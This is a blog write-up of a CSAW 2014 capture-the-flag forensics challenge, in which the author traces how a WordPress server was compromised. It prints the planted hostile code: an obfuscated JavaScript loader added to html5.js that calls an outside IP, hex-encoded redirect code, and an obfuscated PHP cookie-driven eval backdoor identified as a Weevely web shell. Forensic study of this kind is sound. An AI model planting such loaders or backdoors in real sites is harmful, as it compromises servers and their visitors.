CSAW CTF 2014 – Forensics 200 – Fluffy No More

This year I had a little bit of time to participate in NYU Poly’s Cyber Security Annual Capture the Flag event. I didn’t have much time to solve a ton of the challenges, but I did take a good look at 3 of them. Two of which I was able to solve. The third, I got everything but the very last step.

Here’s a writeup of those challenges.

Forensics 300 – Fluffy No More

csaw_2014_forensics_300_fluffy_no_more

With this challenge they gave us a LOT to work with. The tar file CSAW2014-FluffyNoMore-v0.1.tar.bz2 contains the etc_directory, logs, mysql_backup, and the webroot. It’s a ton of stuff to comb through. I won’t tell you everything I looked at, because it was a lot, but I basically just started going through files that looked important.

I started with the apache log files, but there was so much there that I didn’t find anything useful. I noticed there were a lot of attempts to hack the site by visiting strange URLs, but I didn’t get anything from that. Then I looked in the website files. I noticed the most interesting file was the var/log/auth.log file.

The session that started at 19:16:34 was the most interesting (I formatted it to look nicer):

Sep 17 19:16:34 ~/CSAW2014-WordPress ; rm -rf /var/www/html/
Sep 17 19:18:11 ~/CSAW2014-WordPress/var/log/apache2 ; mv access.log error.log other_vhosts_access.log /var/log/apache2/
Sep 17 19:18:29 ~/CSAW2014-WordPress/var/www ; mv html /var/www/
Sep 17 19:18:45 ~/CSAW2014-WordPress/var/www ; chgrp -R www-data /var/www/
Sep 17 19:18:53 ~/CSAW2014-WordPress/var/www ; chmod -R 775 /var/www/
Sep 17 19:20:09 ~/CSAW2014-WordPress/var/www ; vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js
Sep 17 19:20:55 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ * touch {}
Sep 17 19:21:03 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ * -exec touch {}
Sep 17 19:21:24 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ * -exec touch {} ;
Sep 17 19:21:38 ~/CSAW2014-WordPress/var/www ; find /var/www/html/ -name * -exec touch {} ;

The important part is the line about html5.js. Someone specifically edited that file.

If we look at that file, we can see it’s HTML5 Shiv. You can get the original here: HTML5 Shiv v3.7.0

If we run the diff command on these, we see what was added:

var g="ti";var c="HTML Tags";var f=". li colgroup br src datalist script option .";f = f.split(" ");c="";k="/";m=f[6];for(var i=0;i<f.length;i++){c+=f[i].length.toString();}v=f[0];x="\'ht";b=f[4];f=2541*6-35+46+12-15269;c+=f.toString();f=(56+31+68*65+41-548)/4000-1;c+=f.toString();f="";c=c.split("");var w=0;u="s";for(var i=0;i<c.length;i++){if(((i==3||i==6)&&w!=2)||((i==8)&&w==2)){f+=String.fromCharCode(46);w++;}f+=c[i];} i=k+"anal"; document.write("<"+m+" "+b+"="+x+"tp:"+k+k+f+i+"y"+g+"c"+u+v+"j"+u+"\'>\</"+m+"\>"); 

If we enter that into a console, in a browser, it’s basically a redirect using document.write to: htttp://128.238.66.100/analytics.js

Looking through that, you see some additional encoded javascript:

var _0x91fe=["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66","\x5F\x73\x65\x6C\x66","\x6F\x70\x65\x6E"];window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]);

If you run that through UnPHP.net you get:

<?  var _0x91fe=["http://128.238.66.100/announcement.pdf","_self","open"];window[_0x91fe[2]](_0x91fe[0],_0x91fe[1]); ?>

Which is a lot more readable. Opening up that you get a fun PDF.

csaw_2014_forensics_300_announcement_pdf

At this point I got stuck in a dead end. I wasn’t sure where to go. I started taking a look at the webfiles and found an interesting file:

\var\www\html\wp-content\uploads\wysija\themes\weblizer\template.php

which contains:

<?php
$hije = str_replace("ey","","seyteyrey_reyeeypleyaeyceye");
$andp="JsqGMsq9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSsqk9PSdoYScgJisqYgsqJsqGMoJ";
$rhhm="nsqKSwgam9pbihhcnJheV9zbGljZSgkYSwksqYygkYSksqtMykpKSksqpO2VjaG8sqgJsqzwvJy4kay4nPic7fQ==";
$pvqw="GEpPjMpeyRrPSdja2l0JztlY2hvICc8Jy4kaysq4nPicsq7ZXZhbChsqiYXNlNjRfZGVjb2RlKHByZsqWdfcmVw";
$wfrm="bGFjZShhcnsqJheSsqgsqnsqL1teXHcsq9XHNdLycsJy9ccy8nKSwgYsqXJyYXksqoJycsJyssq";
$vyoh = $hije("n", "", "nbnansne64n_ndnecode");
$bpzy = $hije("z","","zczreaztzez_zfzuznzcztzizon");
$xhju = $bpzy('', $vyoh($hije("sq", "", $andp.$pvqw.$wfrm.$rhhm))); $xhju();
?>

More encoding… fun… Throw that into UnPHP.net again and you get:

$c = 'count';
$a = $_COOKIE;
if (reset($a) == 'ha' && $c($a) > 3) {
    $k = 'ckit';
    echo '<' . $k . '>';
    eval(base64_decode (preg_replace(array('/[^\w=\s]/', '/\s/'), array('', '+'), join(array_slice($a, $c($a) - 3)))));
    echo '</' . $k . '>';
}

A bit of digging into that and I was able to find that the format meets the Weevely shell format. Weevely is currently in Backtrack and Backbox and most of the major penetration testing linux distros. I tried finding the key in their cookie to log into their shell, but I ran out of time.

And that’s as far as I got.

From balidani, the rest is pretty simple. Run the announcement.pdf through qpdf:

qpdf -qdf announcement.pdf result.pdf

and then loot at the pdf with your favorite text editor and you’ll find:

var _0xee0b=["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];var y=_0xee0b[0];

A quick decode of the javascript and…. bam! Game Over.

<?  var _0xee0b=["YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb  : ) key{Those Fluffy Bunnies Make Tummy Bumpy}"];var y=_0xee0b[0]; ?>